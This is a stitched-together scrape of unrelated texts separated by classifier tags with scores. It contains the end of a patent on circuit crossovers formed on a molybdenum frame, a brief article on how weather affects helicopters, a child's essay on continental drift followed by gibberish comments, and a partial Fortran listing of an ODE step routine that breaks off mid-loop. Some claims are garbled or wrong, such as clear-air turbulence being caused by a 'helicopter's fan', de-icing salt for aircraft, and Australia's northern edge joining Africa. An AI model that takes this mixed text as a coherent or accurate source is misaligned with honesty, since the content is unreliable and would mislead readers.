16 and the associated bond sites 19 will beconsiderably greater than the plated bond strength initially established between each crossover and the frame 10. As such, the frame may be cleanly peeled from the array of circuit bonded crossovers for reuse, leaving the generated array of crossovers16 reliably and permanently secured to the respectively associated bond sites of the circuit 21, as illustrated in FIG. 3. Advantageously, as previously mentioned, the weaker bond strengths established between the frame 10 and crossovers 16 also inherently provide a reliable way of simultaneously testing the adequacy of the individual bonds established between eachcrossover and the pair of respectively associated bond sites of the circuit. Should any particular crossover not be satisfactorily bonded to a given circuit bond site, that crossover can be readily observed by reason of normally remaining on the frameand, in most cases, by also not being impaired during the peeling of the frame from the circuit, may be individually needle-bonded to the circuit as a final repair operation. Of course, should any crossover be ascertained to be defective, either as aresult of being unsatisfactorily formed during plating, or damaged during either the bonding operation or subsequent peeling of the frame from the circuit bonded crossovers, a new crossover may be readily substituted for the defective crossover. With respect to the crossover-supporting frame 10, molybdenum has been found to be the most advantageous choice of all possible frame materials available, for a number of reasons. First, the frame must remain hard and stable dimensionally duringrepeated use at elevated temperatures and pressures in order to function as a reliable bonding member, as illustrated in FIGS. 2 and 4. Dimensional stability is of particular importance when a randomly distributed array of crossovers, extending over arelatively large circuit surface area, are to be bonded to the circuit simultaneously, with uniform forces imparted thereagainst. Other attributes of molybdenum as the frame material relate to the fact its thermal coefficient of expansion advantageously closely matches that of high alumina ceramic, which is a preferred integrated circuit substrate material. Molybdenum isalso conducive to being chemically, as well as mechanically, milled at reasonable costs, and is resistant to attack by photolithographic processing chemicals. With particular reference to the crossovers 16, they may be formed of solid gold, but preferably, and primarily because of cost, are formed as multi-layered elements, comprised, for example, of successive plated layers of Cu and Au, or Ni, Cu andAu. FIG. 5 illustrates one preferred form of the latter type of multi-layered crossover, comprised of an underlayer 23 of Ni, having a typical thickness of approximately 5-10 microns, an intermediate layer 24 of Cu, having a thickness of approximately15-25 mircrons, and an outer layer 26 of soft gold, having a thickness of approximately 5-15 microns. In some applications it may be desirous to utilize a very thin outer layer of indium, such as in the range of 2-4 microns, in order to reduce thebonding pressure otherwise required to effect bonds with a given peel strength. A problem in using indium, however, is that it has a lower melting point than gold and, hence, has a tendency to flow beyond the bond site interfaces unless the bondingtemperature and pressure are carefully controlled. The degree of curvature of the arches formed in the crossovers will depend, of course, on the dimensions of both the crossovers and the circuit paths. With crossovers typically measuring 4 to 6 mils in width, 40 to 80 mils in length, and 25 to50 microns in thickness, and with the circuit paths to be bridged in a typical thin film circuit measuring 5 to 30 mils in width, and 1 to 10 microns in thickness, it has been found that the grooves 12 in the frame should have a radius of curvature ofapproximately 4.5 mils. Such dimensioned grooves will produce plated crossover arches with a degree of bow that will reliably bridge the circuit paths in question. In general, for most integrated circuit applications such grooves will normally have aradius of curvature, or an otherwise configured maximum arch height, in the range of 3 to 7 mils, formed in a molybdenum frame having a correlated thickness in the range of 6 to 12 mils. The step of aligning the array of frame-supported crossovers 16 with the circuit bond sites 19 may be accomplished in any suitable manner. For example, as illustrated in FIG. 4, a fixture 31, with a plurality of properly positioned locating pins33, may be used for this purpose. By constructing the molybdenum frame 10 with a plurality of locating bores 36 that respectively correspond spatially with the locating pins 33, the frame 10 may be readily positioned on the fixture 31. Should the framebe so thin for a given crossover fabrication application that adequate recessed bores 36 could not be formed therein, the frame could readily be dimensioned such that the bores would extend through the frame in a border region 10a thereof, shown inphantom in FIG. 4, that would protrude beyond the adjacent edge of the circuit substrate not used for alignment purposes. This would allow two or more locating pins 33' to extend completely through the frame without interfering with the positioning ofthe substrate-supported circuit on the frame. Thereafter, the bond sites 19 of the circuit 21 may be readily aligned with the respectively associated crossovers 16 by initially forcing at least two edges of the circuit substrate 22 against at least three upwardly extending, fixture-supportedlocating pins 38, and subsequently lowering the substrate downwardly until contact is made between the respectively aligned crossovers and circuit bond sites. Such desired alignment may be temporarily retained by using a conventional adhesive, such asRohm and Haas's Acryloid B7, applied, for example, to only diagonally opposed corners (not shown) of the frame 10 prior to positioning the circuit substrate 22 thereon. As thus aligned and temporarily secured, the crossover-supporting frame 10 and circuit-supporting substrate 22 may be readily removed from the fixture 31, and inserted in a conventional thermo-compression bonder (not shown) to effect thepermanent bonding of the crossovers 16 to the respectively associated circuit bond sites 19. One such bonder that is particularly adapted for this application is disclosed in the aforementioned Burns et al. U.S. Pat. No. 3,762,040. In connection with whatever type of bonder is employed, it should be appreciated that due to dimensional variations in the substrate, it is extremely difficult to simultaneously bond an array of crossovers with relatively high pressure, such asin the range of 600-900 psi, to multiple circuit bond sites, extending over an appreciable area of a substrate, without inducing cracks therein. Such dimensional variations are often due to a lack of parallelism between the major surfaces due towaviness, warpage, foreign particles, etc. In order to obviate such bonding-induced substrate cracking, a compensating member 42, symbolically shown in FIG. 2 and comprised, for example, of an aluminum screen, such as of 14 mesh wire, woven to have athickness of 40 mils, sandwiched between two 3 to 5 mils thick molybdenum sheets, may be employed to compensate for any of the aforementioned types of dimensional variations in a given substrate. The outer molybdenum sheets are employed to prevent thebonding of the interposed screen to the ram of the bonder, or to the back major surface of the substrate, or both. The construction of such a composite compensating member is more fully described and disclosed in the aforementioned Burn's et al. patent. In a typical crossover bonding operation, it has been found that applying a bonder ram pressure of approximately 2,000 psi through the compensating member to the substrate, so as to establish direct bond site crossover interface bonding pressureon the order of 750 psi, at a temperature of approximately 350.degree. C., and for a duration of about 35 seconds, will effect reliable bonding of the array of crossovers to the circuit bond sites. This is particularly the case when the crossovers, aspreviously noted, are on the order of 40 to 80 mils in length, 4 to 6 mils in width, and 25 to 50 microns in thickness, with each crossover having a first underlayer of nickel, 5-10 microns, an intermediate layer of copper, 15-25 microns, and an outerlayer of soft gold, 5-15 microns in thickness, and with the bond sites being formed with an approximately 12,000 angstrom layer of gold plated on about a 2,000 angstrom layer of palladium which, in turn, has about a 2,000 angstrom layer of titanium. Such circuit bond sites typically form extensions of associated thin film conductive circuit paths processed on high alumina substrates. It should be appreciated, of course, that the degree of force and heat, as well as duration thereof, required to effect thermo-compression bonds with a given bond strength may vary appreciably from the example given above when different types ofmating interface materials are involved. By way of further illustration in this regard, for thin film resistors the circuit would typically comprise a multi-layered build-up of gold, palladium, titanium and tantalum nitride, whereas for thin filmresistors and capacitors, the circuit would typically comprise a multi-layered build-up of gold, nichrome, gold, nichrome, tantalum nitride, beta tantalum and tantalum pentoxide. With respect to bonding, it should also be apparent that other discrete circuit elements can also be bonded to the substrate-supporting circuit simultaneously with the bonding of the array of crossovers thereto. For example, if it is desired tobond one or more beam-leaded devices, or other types of integrated circuit chips (none shown) to the circuit, such devices may be temporarily secured by any suitable means, such as by an adhesive, within nesting regions (not shown) formed in the frame atthe appropriate locations. These devices would thereafter be transferred to and bonded, together with the crossovers, to the common associated circuit. The recessed nesting regions would normally be required so that the devices would protrude above theplanar surfaces on the grooved side of the frame only sufficiently to effect the bonding thereof to the circuit, while at the same time insuring that the bonding forces imparted thereagainst would not damage the devices. The primary advantages in beingable to bond not only the circuit crossovers, but any associated devices and/or components to a common substrate-supported circuit simultaneously, are that not only damage to the various circuit elements would be minimized, primarily as a result ofeliminating many otherwise necessary handling and positioning operations, but bonding costs would also be substantially reduced. In summary, it has been shown that through the use of a uniquely constructed molybdenum frame, a completely additive fabrication method may advantageously be employed to form an array of minute interconnecting circuit crossovers directly on theframe, using photolithographic and plating processes, with the requisite arches of the crossovers being directly formed within specially configured grooves of the frame during the plating operation. The frame is thereafter initially used as a temporarycrossover carrier member, and subsequently as a bonding member during the thermo-compression bonding of the individual crossovers to respectively associated bond sites of the circuit, which typically may be of the thin or thick film type. Such asimplified additive crossover generating technique has been shown to make possible appreciable direct and indirect cost savings, and has the capability of significantly increasing circuit yields, over those realized with prior crossover fabricationprocesses, by obviating the need of not only potentially circuit-damaging chemical etching operations, but the many associated processing and handling steps associated therewith. * * * * *       Recently Added Patents Semiconductor device including insulating layer of cubic system or tetragonal system Fusion of road geometry model information gathered from disparate sources Method and mobile device for awareness of language ability Image generation device with optimized dose control Method and apparatus for exercise monitoring combining exercise monitoring and visual data with wireless internet connectivity Vehicle control apparatus Female urine funnel   Randomly Featured Patents Monitoring boric acid in fluid systems Integrated circuit device socket Single crystal nickel superalloy Treating psychological conditions using muscarinic receptor M.sub.1 antagonists Earth scraper with track apparatus Light emitting means Fail-safe circuit for a control system Hydrostatic differential transmission Interferometric topological metrology with pre-established reference scale Load detecting probe  
__label__pos
0.879567
Are Helicopters Affected by Weather? Just like anything flying in the sky, weather has a major impact on how a helicopter handles its flight. Bad weather conditions can jeopardize the safety of a helicopter, so it’s important for pilots to be aware of the conditions. A safe flight requires good weather conditions, but weather can change quickly, so it is important for pilots to take extra precautions when bad weather hits. Weather that affects a helicopter’s flying and safety Fog, Rain, and Snow Fog, rain and snow affect a pilot’s visibility, making it very dangerous to fly in. It’s safest to avoid flying in these conditions all together, so pilots and air traffic controllers should keep a close eye on the weather and know when to cancel flights. Turbulence helicopter flyingTurbulence can occur in clear air, and can sometimes be missed by a helicopter’s radar. Clear air turbulence usually happens in clear skies in high altitudes, and is caused by small scale wind velocity gradients around the high speed air of the helicopter’s fan. A pilot can learn to handle and get past this turbulence safely will a lot of experience and practice. Frosty Weather Frosty weather can be the most dangerous weather condition to fly in. This happens when the air temperature is below freezing and the humidity level in the atmosphere is high, and can lead to control problems and even crashes. All frost should be cleared off of a helicopter before it takes flight using substances such a antifreeze and de-icing salt. Direction and Speed of the Wind The wind’s direction and speed plays an important role in a helicopter’s flight. The wind that flows opposite to the path of the helicopter slams the helicopter’s nose and slows it down, while the tailwind push forces the helicopter in the same direction it’s going. This can lead pilots to lose control of the helicopter and can cause accidents.
__label__pos
0.999431
Why Do South America and Africa Fit Together Like Puzzle Pieces? The Two Continents Were Once Connected by Lucy Benton, age 12 Two-hundred twenty million years ago the world looked very different. All the continents were joined together into one big land mass, called Pangea. A huge ocean, Panthalassa, surrounded Pangea. Two-hundred million years ago, the northern edge of Australia was connected to the southern edge of Africa. Today, South America and Africa could still fit together like pieces of a jigsaw puzzle. Over millions of years the continents have moved thousands of miles from their position in Pangea. This movement is called continental drift. Even though we don't feel it, the continents are always moving, this is likely due to the pressure of the hot, molten rock moving beneath the Earth's surface. The movement of molten rock through the Earth's interior creates convection currents. These currents move the land above them at varying speeds. North America is drifting away from Europe about one inch a year. Continental drift is a result of a larger phenomenon called “plate tectonics.” The Earth's surface is broken into about 20 tectonic plates. Tectonic plates are giant fragments of the earth's surface. The continents actually sit on top of the tectonic plates and are carried along when their plate moves. The movement of these plates, which carry all of Earth's land masses and bodies of water, is responsible for earthquakes, volcanoes, mountains, and continental drift. When one plate crashes into another it can form high mountain ranges. For example, the Himalayan Mountains were created when India collided into Asia. The Himalayas are still getting higher today because India's plate is still pushing into Asia's. To learn more about tectonic plates, you can read Trinity's article. The natural world is always changing, thanks to tectonic plates. In the future the Pacific Ocean is expected to shrink and the Atlantic Ocean will get wider. Africa may even split along the Great Rift Valley in the east. [Source: The Big Book Of Knowledge ] ahafhahafh – gvjd , ha (2015-11-16 21:18) hadfhdafh This thing stinks – h , agafhad (2015-11-16 21:19) Name Location Email Comment
__label__pos
0.867304
GNU Octave  4.2.1 A high-level interpreted language, primarily intended for numerical computations, mostly compatible with Matlab  All Classes Namespaces Files Functions Variables Typedefs Enumerations Enumerator Properties Friends Macros Pages sstode.f Go to the documentation of this file. 1  SUBROUTINE sstode (NEQ, Y, YH, NYH, YH1, EWT, SAVF, ACOR, 2  1 wm, iwm, f, jac, pjac, slvs) 3 C***BEGIN PROLOGUE SSTODE 4 C***SUBSIDIARY 5 C***PURPOSE Performs one step of an ODEPACK integration. 6 C***TYPE SINGLE PRECISION (SSTODE-S, DSTODE-D) 7 C***AUTHOR Hindmarsh, Alan C., (LLNL) 8 C***DESCRIPTION 9 C 10 C SSTODE performs one step of the integration of an initial value 11 C problem for a system of ordinary differential equations. 12 C Note: SSTODE is independent of the value of the iteration method 13 C indicator MITER, when this is .ne. 0, and hence is independent 14 C of the type of chord method used, or the Jacobian structure. 15 C Communication with SSTODE is done with the following variables: 16 C 17 C NEQ = integer array containing problem size in NEQ(1), and 18 C passed as the NEQ argument in all calls to F and JAC. 19 C Y = an array of length .ge. N used as the Y argument in 20 C all calls to F and JAC. 21 C YH = an NYH by LMAX array containing the dependent variables 22 C and their approximate scaled derivatives, where 23 C LMAX = MAXORD + 1. YH(i,j+1) contains the approximate 24 C j-th derivative of y(i), scaled by h**j/factorial(j) 25 C (j = 0,1,...,NQ). on entry for the first step, the first 26 C two columns of YH must be set from the initial values. 27 C NYH = a constant integer .ge. N, the first dimension of YH. 28 C YH1 = a one-dimensional array occupying the same space as YH. 29 C EWT = an array of length N containing multiplicative weights 30 C for local error measurements. Local errors in Y(i) are 31 C compared to 1.0/EWT(i) in various error tests. 32 C SAVF = an array of working storage, of length N. 33 C Also used for input of YH(*,MAXORD+2) when JSTART = -1 34 C and MAXORD .lt. the current order NQ. 35 C ACOR = a work array of length N, used for the accumulated 36 C corrections. On a successful return, ACOR(i) contains 37 C the estimated one-step local error in Y(i). 38 C WM,IWM = real and integer work arrays associated with matrix 39 C operations in chord iteration (MITER .ne. 0). 40 C PJAC = name of routine to evaluate and preprocess Jacobian matrix 41 C and P = I - h*el0*JAC, if a chord method is being used. 42 C SLVS = name of routine to solve linear system in chord iteration. 43 C CCMAX = maximum relative change in h*el0 before PJAC is called. 44 C H = the step size to be attempted on the next step. 45 C H is altered by the error control algorithm during the 46 C problem. H can be either positive or negative, but its 47 C sign must remain constant throughout the problem. 48 C HMIN = the minimum absolute value of the step size h to be used. 49 C HMXI = inverse of the maximum absolute value of h to be used. 50 C HMXI = 0.0 is allowed and corresponds to an infinite hmax. 51 C HMIN and HMXI may be changed at any time, but will not 52 C take effect until the next change of h is considered. 53 C TN = the independent variable. TN is updated on each step taken. 54 C JSTART = an integer used for input only, with the following 55 C values and meanings: 56 C 0 perform the first step. 57 C .gt.0 take a new step continuing from the last. 58 C -1 take the next step with a new value of H, MAXORD, 59 C N, METH, MITER, and/or matrix parameters. 60 C -2 take the next step with a new value of H, 61 C but with other inputs unchanged. 62 C On return, JSTART is set to 1 to facilitate continuation. 63 C KFLAG = a completion code with the following meanings: 64 C 0 the step was succesful. 65 C -1 the requested error could not be achieved. 66 C -2 corrector convergence could not be achieved. 67 C -3 fatal error in PJAC or SLVS. 68 C A return with KFLAG = -1 or -2 means either 69 C abs(H) = HMIN or 10 consecutive failures occurred. 70 C On a return with KFLAG negative, the values of TN and 71 C the YH array are as of the beginning of the last 72 C step, and H is the last step size attempted. 73 C MAXORD = the maximum order of integration method to be allowed. 74 C MAXCOR = the maximum number of corrector iterations allowed. 75 C MSBP = maximum number of steps between PJAC calls (MITER .gt. 0). 76 C MXNCF = maximum number of convergence failures allowed. 77 C METH/MITER = the method flags. See description in driver. 78 C N = the number of first-order differential equations. 79 C The values of CCMAX, H, HMIN, HMXI, TN, JSTART, KFLAG, MAXORD, 80 C MAXCOR, MSBP, MXNCF, METH, MITER, and N are communicated via COMMON. 81 C 82 C***SEE ALSO SLSODE 83 C***ROUTINES CALLED SCFODE, SVNORM 84 C***COMMON BLOCKS SLS001 85 C***REVISION HISTORY (YYMMDD) 86 C 791129 DATE WRITTEN 87 C 890501 Modified prologue to SLATEC/LDOC format. (FNF) 88 C 890503 Minor cosmetic changes. (FNF) 89 C 930809 Renamed to allow single/double precision versions. (ACH) 90 C 010413 Reduced size of Common block /SLS001/. (ACH) 91 C 031105 Restored 'own' variables to Common block /SLS001/, to 92 C enable interrupt/restart feature. (ACH) 93 C***END PROLOGUE SSTODE 94 C**End 95  EXTERNAL f, jac, pjac, slvs 96  INTEGER NEQ, NYH, IWM 97  REAL Y, YH, YH1, EWT, SAVF, ACOR, WM 98  dimension neq(*), y(*), yh(nyh,*), yh1(*), ewt(*), savf(*), 99  1 acor(*), wm(*), iwm(*) 100  INTEGER INIT, MXSTEP, MXHNIL, NHNIL, NSLAST, CNYH, 101  1 ialth, ipup, lmax, meo, nqnyh, nslp, 102  1 icf, ierpj, iersl, jcur, jstart, kflag, l, 103  2 lyh, lewt, lacor, lsavf, lwm, liwm, meth, miter, 104  3 maxord, maxcor, msbp, mxncf, n, nq, nst, nfe, nje, nqu 105  INTEGER I, I1, IREDO, IRET, J, JB, M, NCF, NEWQ 106  REAL CONIT, CRATE, EL, ELCO, HOLD, RMAX, TESCO, 107  1 ccmax, el0, h, hmin, hmxi, hu, rc, tn, uround 108  REAL DCON, DDN, DEL, DELP, DSM, DUP, EXDN, EXSM, EXUP, 109  1 r, rh, rhdn, rhsm, rhup, told, svnorm 110  COMMON /sls001/ conit, crate, el(13), elco(13,12), 111  1 hold, rmax, tesco(3,12), 112  1 ccmax, el0, h, hmin, hmxi, hu, rc, tn, uround, 113  2 init, mxstep, mxhnil, nhnil, nslast, cnyh, 114  3 ialth, ipup, lmax, meo, nqnyh, nslp, 115  3 icf, ierpj, iersl, jcur, jstart, kflag, l, 116  4 lyh, lewt, lacor, lsavf, lwm, liwm, meth, miter, 117  5 maxord, maxcor, msbp, mxncf, n, nq, nst, nfe, nje, nqu 118 C 119 C***FIRST EXECUTABLE STATEMENT SSTODE 120  kflag = 0 121  told = tn 122  ncf = 0 123  ierpj = 0 124  iersl = 0 125  jcur = 0 126  icf = 0 127  delp = 0.0e0 128  IF (jstart .GT. 0) go to 200 129  IF (jstart .EQ. -1) go to 100 130  IF (jstart .EQ. -2) go to 160 131 C----------------------------------------------------------------------- 132 C On the first call, the order is set to 1, and other variables are 133 C initialized. RMAX is the maximum ratio by which H can be increased 134 C in a single step. It is initially 1.E4 to compensate for the small 135 C initial H, but then is normally equal to 10. If a failure 136 C occurs (in corrector convergence or error test), RMAX is set to 2 137 C for the next increase. 138 C----------------------------------------------------------------------- 139  lmax = maxord + 1 140  nq = 1 141  l = 2 142  ialth = 2 143  rmax = 10000.0e0 144  rc = 0.0e0 145  el0 = 1.0e0 146  crate = 0.7e0 147  hold = h 148  meo = meth 149  nslp = 0 150  ipup = miter 151  iret = 3 152  go to 140 153 C----------------------------------------------------------------------- 154 C The following block handles preliminaries needed when JSTART = -1. 155 C IPUP is set to MITER to force a matrix update. 156 C If an order increase is about to be considered (IALTH = 1), 157 C IALTH is reset to 2 to postpone consideration one more step. 158 C If the caller has changed METH, SCFODE is called to reset 159 C the coefficients of the method. 160 C If the caller has changed MAXORD to a value less than the current 161 C order NQ, NQ is reduced to MAXORD, and a new H chosen accordingly. 162 C If H is to be changed, YH must be rescaled. 163 C If H or METH is being changed, IALTH is reset to L = NQ + 1 164 C to prevent further changes in H for that many steps. 165 C----------------------------------------------------------------------- 166  100 ipup = miter 167  lmax = maxord + 1 168  IF (ialth .EQ. 1) ialth = 2 169  IF (meth .EQ. meo) go to 110 170  CALL scfode(meth, elco, tesco) 171  meo = meth 172  IF (nq .GT. maxord) go to 120 173  ialth = l 174  iret = 1 175  go to 150 176  110 IF (nq .LE. maxord) go to 160 177  120 nq = maxord 178  l = lmax 179  DO 125 i = 1,l 180  125 el(i) = elco(i,nq) 181  nqnyh = nq*nyh 182  rc = rc*el(1)/el0 183  el0 = el(1) 184  conit = 0.5e0/(nq+2) 185  ddn = svnorm(n, savf, ewt)/tesco(1,l) 186  exdn = 1.0e0/l 187  rhdn = 1.0e0/(1.3e0*ddn**exdn + 0.0000013e0) 188  rh = min(rhdn,1.0e0) 189  iredo = 3 190  IF (h .EQ. hold) go to 170 191  rh = min(rh,abs(h/hold)) 192  h = hold 193  go to 175 194 C----------------------------------------------------------------------- 195 C SCFODE is called to get all the integration coefficients for the 196 C current METH. Then the EL vector and related constants are reset 197 C whenever the order NQ is changed, or at the start of the problem. 198 C----------------------------------------------------------------------- 199  140 CALL scfode(meth, elco, tesco) 200  150 DO 155 i = 1,l 201  155 el(i) = elco(i,nq) 202  nqnyh = nq*nyh 203  rc = rc*el(1)/el0 204  el0 = el(1) 205  conit = 0.5e0/(nq+2) 206  go to(160, 170, 200), iret 207 C----------------------------------------------------------------------- 208 C If H is being changed, the H ratio RH is checked against 209 C RMAX, HMIN, and HMXI, and the YH array rescaled. IALTH is set to 210 C L = NQ + 1 to prevent a change of H for that many steps, unless 211 C forced by a convergence or error test failure. 212 C----------------------------------------------------------------------- 213  160 IF (h .EQ. hold) go to 200 214  rh = h/hold 215  h = hold 216  iredo = 3 217  go to 175 218  170 rh = max(rh,hmin/abs(h)) 219  175 rh = min(rh,rmax) 220  rh = rh/max(1.0e0,abs(h)*hmxi*rh) 221  r = 1.0e0 222  DO 180 j = 2,l 223  r = r*rh 224  DO 180 i = 1,n 225  180 yh(i,j) = yh(i,j)*r 226  h = h*rh 227  rc = rc*rh 228  ialth = l 229  IF (iredo .EQ. 0) go to 690 230 C----------------------------------------------------------------------- 231 C This section computes the predicted values by effectively 232 C multiplying the YH array by the Pascal Triangle matrix. 233 C RC is the ratio of new to old values of the coefficient H*EL(1). 234 C When RC differs from 1 by more than CCMAX, IPUP is set to MITER 235 C to force PJAC to be called, if a Jacobian is involved. 236 C In any case, PJAC is called at least every MSBP steps. 237 C----------------------------------------------------------------------- 238  200 IF (abs(rc-1.0e0) .GT. ccmax) ipup = miter 239  IF (nst .GE. nslp+msbp) ipup = miter 240  tn = tn + h 241  i1 = nqnyh + 1 242  DO 215 jb = 1,nq 243  i1 = i1 - nyh 244 Cdir$ ivdep 245  DO 210 i = i1,nqnyh 246  210 yh1(i) = yh1(i) + yh1(i+nyh) 247  215 CONTINUE 248 C----------------------------------------------------------------------- 249 C Up to MAXCOR corrector iterations are taken. A convergence test is 250 C made on the R.M.S. norm of each correction, weighted by the error 251 C weight vector EWT. The sum of the corrections is accumulated in the 252 C vector ACOR(i). The YH array is not altered in the corrector loop. 253 C----------------------------------------------------------------------- 254  220 m = 0 255  DO 230 i = 1,n 256  230 y(i) = yh(i,1) 257  CALL f(neq, tn, y, savf) 258  nfe = nfe + 1 259  IF (ipup .LE. 0) go to 250 260 C----------------------------------------------------------------------- 261 C If indicated, the matrix P = I - h*el(1)*J is reevaluated and 262 C preprocessed before starting the corrector iteration. IPUP is set 263 C to 0 as an indicator that this has been done. 264 C----------------------------------------------------------------------- 265  CALL pjac(neq, y, yh, nyh, ewt, acor, savf, wm, iwm, f, jac) 266  ipup = 0 267  rc = 1.0e0 268  nslp = nst 269  crate = 0.7e0 270  IF (ierpj .NE. 0) go to 430 271  250 DO 260 i = 1,n 272  260 acor(i) = 0.0e0 273  270 IF (miter .NE. 0) go to 350 274 C----------------------------------------------------------------------- 275 C In the case of functional iteration, update Y directly from 276 C the result of the last function evaluation. 277 C----------------------------------------------------------------------- 278  DO 290 i = 1,n 279  savf(i) = h*savf(i) - yh(i,2) 280  290 y(i) = savf(i) - acor(i) 281  del = svnorm(n, y, ewt) 282  DO 300 i = 1,n 283  y(i) = yh(i,1) + el(1)*savf(i) 284  300 acor(i) = savf(i) 285  go to 400 286 C----------------------------------------------------------------------- 287 C In the case of the chord method, compute the corrector error, 288 C and solve the linear system with that as right-hand side and 289 C P as coefficient matrix. 290 C----------------------------------------------------------------------- 291  350 DO 360 i = 1,n 292  360 y(i) = h*savf(i) - (yh(i,2) + acor(i)) 293  CALL slvs(wm, iwm, y, savf) 294  IF (iersl .LT. 0) go to 430 295  IF (iersl .GT. 0) go to 410 296  del = svnorm(n, y, ewt) 297  DO 380 i = 1,n 298  acor(i) = acor(i) + y(i) 299  380 y(i) = yh(i,1) + el(1)*acor(i) 300 C----------------------------------------------------------------------- 301 C Test for convergence. If M.gt.0, an estimate of the convergence 302 C rate constant is stored in CRATE, and this is used in the test. 303 C----------------------------------------------------------------------- 304  400 IF (m .NE. 0) crate = max(0.2e0*crate,del/delp) 305  dcon = del*min(1.0e0,1.5e0*crate)/(tesco(2,nq)*conit) 306  IF (dcon .LE. 1.0e0) go to 450 307  m = m + 1 308  IF (m .EQ. maxcor) go to 410 309  IF (m .GE. 2 .AND. del .GT. 2.0e0*delp) go to 410 310  delp = del 311  CALL f(neq, tn, y, savf) 312  nfe = nfe + 1 313  go to 270 314 C----------------------------------------------------------------------- 315 C The corrector iteration failed to converge. 316 C If MITER .ne. 0 and the Jacobian is out of date, PJAC is called for 317 C the next try. Otherwise the YH array is retracted to its values 318 C before prediction, and H is reduced, if possible. If H cannot be 319 C reduced or MXNCF failures have occurred, exit with KFLAG = -2. 320 C----------------------------------------------------------------------- 321  410 IF (miter .EQ. 0 .OR. jcur .EQ. 1) go to 430 322  icf = 1 323  ipup = miter 324  go to 220 325  430 icf = 2 326  ncf = ncf + 1 327  rmax = 2.0e0 328  tn = told 329  i1 = nqnyh + 1 330  DO 445 jb = 1,nq 331  i1 = i1 - nyh 332 Cdir$ ivdep 333  DO 440 i = i1,nqnyh 334  440 yh1(i) = yh1(i) - yh1(i+nyh) 335  445 CONTINUE 336  IF (ierpj .LT. 0 .OR. iersl .LT. 0) go to 680 337  IF (abs(h) .LE. hmin*1.00001e0) go to 670 338  IF (ncf .EQ. mxncf) go to 670 339  rh = 0.25e0 340  ipup = miter 341  iredo = 1 342  go to 170 343 C----------------------------------------------------------------------- 344 C The corrector has converged. JCUR is set to 0 345 C to signal that the Jacobian involved may need updating later. 346 C The local error test is made and control passes to statement 500 347 C if it fails. 348 C----------------------------------------------------------------------- 349  450 jcur = 0 350  IF (m .EQ. 0) dsm = del/tesco(2,nq) 351  IF (m .GT. 0) dsm = svnorm(n, acor, ewt)/tesco(2,nq) 352  IF (dsm .GT. 1.0e0) go to 500 353 C----------------------------------------------------------------------- 354 C After a successful step, update the YH array. 355 C Consider changing H if IALTH = 1. Otherwise decrease IALTH by 1. 356 C If IALTH is then 1 and NQ .lt. MAXORD, then ACOR is saved for 357 C use in a possible order increase on the next step. 358 C If a change in H is considered, an increase or decrease in order 359 C by one is considered also. A change in H is made only if it is by a 360 C factor of at least 1.1. If not, IALTH is set to 3 to prevent 361 C testing for that many steps. 362 C----------------------------------------------------------------------- 363  kflag = 0 364  iredo = 0 365  nst = nst + 1 366  hu = h 367  nqu = nq 368  DO 470 j = 1,l 369  DO 470 i = 1,n 370  470 yh(i,j) = yh(i,j) + el(j)*acor(i) 371  ialth = ialth - 1 372  IF (ialth .EQ. 0) go to 520 373  IF (ialth .GT. 1) go to 700 374  IF (l .EQ. lmax) go to 700 375  DO 490 i = 1,n 376  490 yh(i,lmax) = acor(i) 377  go to 700 378 C----------------------------------------------------------------------- 379 C The error test failed. KFLAG keeps track of multiple failures. 380 C Restore TN and the YH array to their previous values, and prepare 381 C to try the step again. Compute the optimum step size for this or 382 C one lower order. After 2 or more failures, H is forced to decrease 383 C by a factor of 0.2 or less. 384 C----------------------------------------------------------------------- 385  500 kflag = kflag - 1 386  tn = told 387  i1 = nqnyh + 1 388  DO 515 jb = 1,nq 389  i1 = i1 - nyh 390 Cdir$ ivdep 391  DO 510 i = i1,nqnyh 392  510 yh1(i) = yh1(i) - yh1(i+nyh) 393  515 CONTINUE 394  rmax = 2.0e0 395  IF (abs(h) .LE. hmin*1.00001e0) go to 660 396  IF (kflag .LE. -3) go to 640 397  iredo = 2 398  rhup = 0.0e0 399  go to 540 400 C----------------------------------------------------------------------- 401 C Regardless of the success or failure of the step, factors 402 C RHDN, RHSM, and RHUP are computed, by which H could be multiplied 403 C at order NQ - 1, order NQ, or order NQ + 1, respectively. 404 C In the case of failure, RHUP = 0.0 to avoid an order increase. 405 C The largest of these is determined and the new order chosen 406 C accordingly. If the order is to be increased, we compute one 407 C additional scaled derivative. 408 C----------------------------------------------------------------------- 409  520 rhup = 0.0e0 410  IF (l .EQ. lmax) go to 540 411  DO 530 i = 1,n 412  530 savf(i) = acor(i) - yh(i,lmax) 413  dup = svnorm(n, savf, ewt)/tesco(3,nq) 414  exup = 1.0e0/(l+1) 415  rhup = 1.0e0/(1.4e0*dup**exup + 0.0000014e0) 416  540 exsm = 1.0e0/l 417  rhsm = 1.0e0/(1.2e0*dsm**exsm + 0.0000012e0) 418  rhdn = 0.0e0 419  IF (nq .EQ. 1) go to 560 420  ddn = svnorm(n, yh(1,l), ewt)/tesco(1,nq) 421  exdn = 1.0e0/nq 422  rhdn = 1.0e0/(1.3e0*ddn**exdn + 0.0000013e0) 423  560 IF (rhsm .GE. rhup) go to 570 424  IF (rhup .GT. rhdn) go to 590 425  go to 580 426  570 IF (rhsm .LT. rhdn) go to 580 427  newq = nq 428  rh = rhsm 429  go to 620 430  580 newq = nq - 1 431  rh = rhdn 432  IF (kflag .LT. 0 .AND. rh .GT. 1.0e0) rh = 1.0e0 433  go to 620 434  590 newq = l 435  rh = rhup 436  IF (rh .LT. 1.1e0) go to 610 437  r = el(l)/l 438  DO 600 i = 1,n 439  600 yh(i,newq+1) = acor(i)*r 440  go to 630 441  610 ialth = 3 442  go to 700 443  620 IF ((kflag .EQ. 0) .AND. (rh .LT. 1.1e0)) go to 610 444  IF (kflag .LE. -2) rh = min(rh,0.2e0) 445 C----------------------------------------------------------------------- 446 C If there is a change of order, reset NQ, l, and the coefficients. 447 C In any case H is reset according to RH and the YH array is rescaled. 448 C Then exit from 690 if the step was OK, or redo the step otherwise. 449 C----------------------------------------------------------------------- 450  IF (newq .EQ. nq) go to 170 451  630 nq = newq 452  l = nq + 1 453  iret = 2 454  go to 150 455 C----------------------------------------------------------------------- 456 C Control reaches this section if 3 or more failures have occurred. 457 C If 10 failures have occurred, exit with KFLAG = -1. 458 C It is assumed that the derivatives that have accumulated in the 459 C YH array have errors of the wrong order. Hence the first 460 C derivative is recomputed, and the order is set to 1. Then 461 C H is reduced by a factor of 10, and the step is retried, 462 C until it succeeds or H reaches HMIN. 463 C----------------------------------------------------------------------- 464  640 IF (kflag .EQ. -10) go to 660 465  rh = 0.1e0 466  rh = max(hmin/abs(h),rh) 467  h = h*rh 468  DO 645 i = 1,n 469 